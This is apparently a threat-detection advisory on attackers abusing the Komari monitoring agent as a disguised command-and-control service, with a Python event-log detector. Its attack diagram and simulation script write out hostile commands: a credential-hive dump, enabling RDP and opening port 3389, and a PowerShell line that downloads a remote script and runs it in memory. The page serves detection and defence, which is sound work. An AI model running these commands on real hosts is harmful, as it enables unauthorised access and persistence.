SOC Prime Bias: Critical

30 Apr 2026 17:19

Komari: The “Monitoring” Tool That Didn’t Need Weaponising


Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A threat actor used stolen VPN credentials to access a Huntress partner’s Windows workstation, then enabled RDP and deployed the open-source Komari monitoring agent as a SYSTEM-level service disguised as Windows Update Service through NSSM. Once installed, the agent established a persistent WebSocket connection to attacker-controlled infrastructure and provided capabilities such as command execution, terminal access, and heartbeat-style pinging. In practice, the tool functioned as a lightweight command-and-control framework without requiring additional weaponization.

Investigation

The intrusion began with an SSL VPN login originating from 45.153.34.132, followed by the use of Impacket’s smbexec.py to enable RDP and run a series of remote commands. Investigators found that a PowerShell one-liner downloaded the Komari installer directly from GitHub and registered it as a Windows service. That service then launched komari-agent.exe, opened a WebSocket session to the attacker’s server, and enabled arbitrary remote command execution on the host.

Mitigation

Huntress responded by isolating the compromised workstation, disabling the affected user account, and stopping the NSSM-created Komari service. The malicious WebSocket connection was blocked, and the persistence mechanism was removed from the system. Recommended follow-up defenses include tightening VPN access controls, monitoring for suspicious service creation events, inspecting outbound WebSocket activity, and strengthening RDP security.

Response

Defenders should detect creation of a Windows service named Windows Update Service that points to komari-agent.exe, monitor for long-lived outbound WebSocket connections to unfamiliar hosts, and alert on the use of Impacket tools such as smbexec.py for lateral movement. If identified, the affected endpoint should be contained immediately, compromised credentials revoked, and the rogue service removed from the environment.
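As an added example, not SOC Prime rule content or code from the Huntress investigation, the service-creation check described above applied to the message body of Windows System log Event ID 7045 ("A service was installed in the system"). The sample events and the file paths in them are constructed; the real incident's paths are not on this page.

```python
import re

# Fields of the Event ID 7045 message body ("A service was installed in the system.").
FIELD = re.compile(r"^Service (Name|File Name|Start Type|Account):\s*(.*)$", re.MULTILINE)
# Binaries the incident's persistence chain used: the NSSM wrapper and the Komari agent.
SUSPECT_BINARY = re.compile(r"\b(nssm|komari-agent)\.exe\b", re.IGNORECASE)
# Service names that imitate a built-in Windows component (compared case-insensitively).
MASQUERADE_NAMES = {"windows update service"}

def parse_7045(message):
    """Return the 7045 fields as a dict keyed 'Name', 'File Name', 'Start Type', 'Account'."""
    return {key: value.strip() for key, value in FIELD.findall(message)}

def classify(fields):
    """Return the reasons a service install is suspicious; an empty list means benign."""
    reasons = []
    path = fields.get("File Name", "")
    if SUSPECT_BINARY.search(path):
        reasons.append("binary is nssm.exe or komari-agent.exe")
    if fields.get("Name", "").lower() in MASQUERADE_NAMES and "\\windows\\system32\\" not in path.lower():
        reasons.append("Windows-sounding service name outside System32")
    # A SYSTEM-level auto-start service is the persistence shape seen in the incident.
    if reasons and fields.get("Account", "").lower() == "localsystem" \
            and fields.get("Start Type", "").lower() == "auto start":
        reasons.append("auto-start as LocalSystem")
    return reasons

def scan(messages):
    """Map the service name of every flagged event to its list of reasons."""
    hits = {}
    for message in messages:
        fields = parse_7045(message)
        reasons = classify(fields)
        if reasons:
            hits[fields.get("Name", "?")] = reasons
    return hits

# Constructed sample events in the 7045 message layout; the paths are made up.
SAMPLE_EVENTS = [
    "A service was installed in the system.\n\nService Name:  Windows Update Service\n"
    "Service File Name:  C:\\ProgramData\\komari\\nssm.exe\nService Type:  user mode service\n"
    "Service Start Type:  auto start\nService Account:  LocalSystem\n",
    "A service was installed in the system.\n\nService Name:  BackupAgent\n"
    "Service File Name:  \"C:\\Program Files\\Backup\\agent.exe\"\nService Type:  user mode service\n"
    "Service Start Type:  auto start\nService Account:  NT AUTHORITY\\LocalService\n",
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS).items():
        print(f"ALERT {name}: {'; '.join(reasons)}")
```

The legitimate Windows Update service (wuauserv, hosted by svchost.exe under System32) is not flagged by the masquerade check, which is why the path test is part of the rule rather than the name alone.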

Attack Flow

    graph TB
        %% Class Definitions
        classDef action fill:#99ccff
        classDef technique fill:#ffcc99
        classDef tool fill:#cccccc
        classDef process fill:#e6e6fa

        %% Nodes – Actions / Techniques
        action_initial_access["<b>Action</b> – <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use stolen VPN credentials to establish an SSLVPN session and gain initial access."]
        class action_initial_access technique
        action_cred_dump["<b>Action</b> – <b>T1552.002 Unsecured Credentials</b><br/><b>Description</b>: Dump SAM, System and Security registry hives to obtain password hashes."]
        class action_cred_dump technique
        action_enable_rdp["<b>Action</b> – <b>T1599 Network Boundary Bridging</b><br/><b>Description</b>: Modify the registry key fDenyTSConnections to enable Remote Desktop Protocol access."]
        class action_enable_rdp technique
        action_firewall_rule["<b>Action</b> – <b>T1562.004 Impair Defenses</b><br/><b>Description</b>: Create a firewall rule named Allow RDP that opens inbound TCP port 3389."]
        class action_firewall_rule technique

        %% Nodes – Tools / Processes
        tool_vpn["<b>Tool</b> – <b>Name</b>: VPN Client<br/><b>Purpose</b>: Connect to corporate network via SSLVPN."]
        class tool_vpn tool
        process_regdump["<b>Process</b> – <b>Command</b>: reg save HKLM\\SYSTEM\\…<br/><b>Description</b>: Dump SAM, System and Security hives."]
        class process_regdump process
        process_reg_modify["<b>Process</b> – <b>Command</b>: reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/><b>Description</b>: Enable RDP through registry modification."]
        class process_reg_modify process
        process_fw_rule["<b>Process</b> – <b>Command</b>: netsh advfirewall firewall add rule name=#quot;Allow RDP#quot; dir=in action=allow protocol=TCP localport=3389<br/><b>Description</b>: Add firewall rule to allow inbound RDP traffic."]
        class process_fw_rule process

        %% Connections
        action_initial_access -->|uses| tool_vpn
        action_initial_access -->|leads to| action_cred_dump
        action_cred_dump -->|uses| process_regdump
        action_cred_dump -->|leads to| action_enable_rdp
        action_enable_rdp -->|uses| process_reg_modify
        action_enable_rdp -->|leads to| action_firewall_rule
        action_firewall_rule -->|uses| process_fw_rule

Detections

  • Possible Impacket Command Line Patterns (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Possible Remote Code Execution using Impacket (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Download or Upload via Powershell (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Possible Remote Desktop Services Shadowing (via process_creation), by SOC Prime Team, 30 Apr 2026
  • Suspicious Firewall Modifications via CLI (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Suspicious Process Utilizes a URL in the Command Line (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Alternative Remote Access / Management Software (via process_creation), by SOC Prime Team, 30 Apr 2026
  • IOCs (HashSha256) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • IOCs (SourceIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • IOCs (DestinationIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • Detection of Impacket smbexec.py and cmd.exe Execution via RDP [Windows Process Creation], by SOC Prime AI Rules, 30 Apr 2026
  • PowerShell Execution for Komari Agent Installation [Windows Powershell], by SOC Prime AI Rules, 30 Apr 2026
  • Detect Komari Agent Persistence via Windows Update Service [Windows System], by SOC Prime AI Rules, 30 Apr 2026
  • Detection of Unauthorized SSLVPN Access and Post-Compromise Activity [Firewall], by SOC Prime AI Rules, 30 Apr 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a Windows host and wants to install the Komari C2 agent to maintain persistence and later dump credentials (T1003.001). To avoid triggering traditional script-blocking defenses, the attacker runs PowerShell with -ExecutionPolicy Bypass and directly downloads the installer from the public GitHub repository. The command line matches the detection rule exactly, generating the expected telemetry.

  • Regression Test Script:

    # Komari Agent Installation Simulation
    # Launched under powershell.exe -ExecutionPolicy Bypass, as in the narrative above, so the
    # resulting command line carries the download-and-execute pattern the rule is written for.
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    # Fetch the public installer script and run it in-memory, without writing it to disk
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script

  • Cleanup Commands:

    # Remove any files created by the simulated installer (if any); the Komari folder under
    # Program Files is an assumed install location, adjust it if the installer used another path
    Remove-Item -Path "$Env:ProgramFiles\Komari" -Recurse -Force -ErrorAction SilentlyContinue
    # Stop any Komari process that may have been started (covers komari-agent.exe as well)
    Get-Process -Name "komari*" -ErrorAction SilentlyContinue | Stop-Process -Force